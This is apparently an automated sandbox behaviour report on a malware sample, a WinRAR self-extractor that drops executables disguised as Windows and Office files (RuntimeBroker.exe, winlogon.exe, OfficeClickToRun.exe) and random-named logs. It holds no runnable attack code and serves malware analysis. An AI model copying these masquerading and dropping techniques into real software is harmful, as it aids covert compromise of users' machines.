                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: version.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: slc.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Recovery\RuntimeBroker.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: voed9G7p5s.exeStatic file information: File size 2342562 > 1048576
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: voed9G7p5s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: voed9G7p5s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: voed9G7p5s.exe
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: voed9G7p5s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeFile created: C:\savesSession\__tmp_rar_sfx_access_check_3787062Jump to behavior
                          Source: voed9G7p5s.exeStatic PE information: section name: .didat
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1F640 push ecx; ret 0_2_00E1F653
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1EB78 push eax; ret 0_2_00E1EB96
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6AB35 push edi; iretd 4_2_00007FFD9BC6AB36
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC70B04 pushfd ; iretd 4_2_00007FFD9BC70B2A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6AA77 push edi; iretd 4_2_00007FFD9BC6AA78
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6A9A6 push edi; iretd 4_2_00007FFD9BC6A9A7
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC65924 push esi; iretd 4_2_00007FFD9BC6592A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC658F2 push esi; iretd 4_2_00007FFD9BC6592A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6B085 pushad ; iretd 4_2_00007FFD9BC6B099
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6F85B push edi; iretd 4_2_00007FFD9BC6F85C
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6F78B push edi; iretd 4_2_00007FFD9BC6F78C
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC6F6CA push edi; iretd 4_2_00007FFD9BC6F6CB
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BD14262 push es; ret 4_2_00007FFD9BD14264
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BD15619 push edx; retf 4_2_00007FFD9BD15621
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BD24262 push es; ret 9_2_00007FFD9BD24264
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BD25619 push edx; retf 9_2_00007FFD9BD25621
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9C1B96E2 push E95B40BFh; ret 9_2_00007FFD9C1B96F9
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9C1B000A push esp; iretd 9_2_00007FFD9C1B004A
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\MqhNXtrC.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\lAIZxBgi.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\savesSession\winlogon.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\HufwPOBJ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\Default\Videos\OfficeClickToRun.exeJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\yZRgoalJ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\ERuFRGqx.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\vomPhMaQ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Program Files (x86)\jDownloader\config\dllhost.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\odsQwJqu.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\HCaVYTBq.logJump to dropped file
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeFile created: C:\savesSession\ComponentBrokermonitor.exeJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\PYnlzHQq.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\jpaRTMbF.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\eKDszVMz.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\yIzGwiSf.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\gNqaUEQu.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\JfKMXbLC.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\HufwPOBJ.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\odsQwJqu.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\yIzGwiSf.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\MqhNXtrC.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\JfKMXbLC.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\jpaRTMbF.logJump to dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\PYnlzHQq.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\eKDszVMz.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\HCaVYTBq.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\yZRgoalJ.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\gNqaUEQu.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\ERuFRGqx.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\vomPhMaQ.logJump to dropped file
                          Source: C:\Recovery\RuntimeBroker.exeFile created: C:\Users\user\Desktop\lAIZxBgi.logJump to dropped file
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
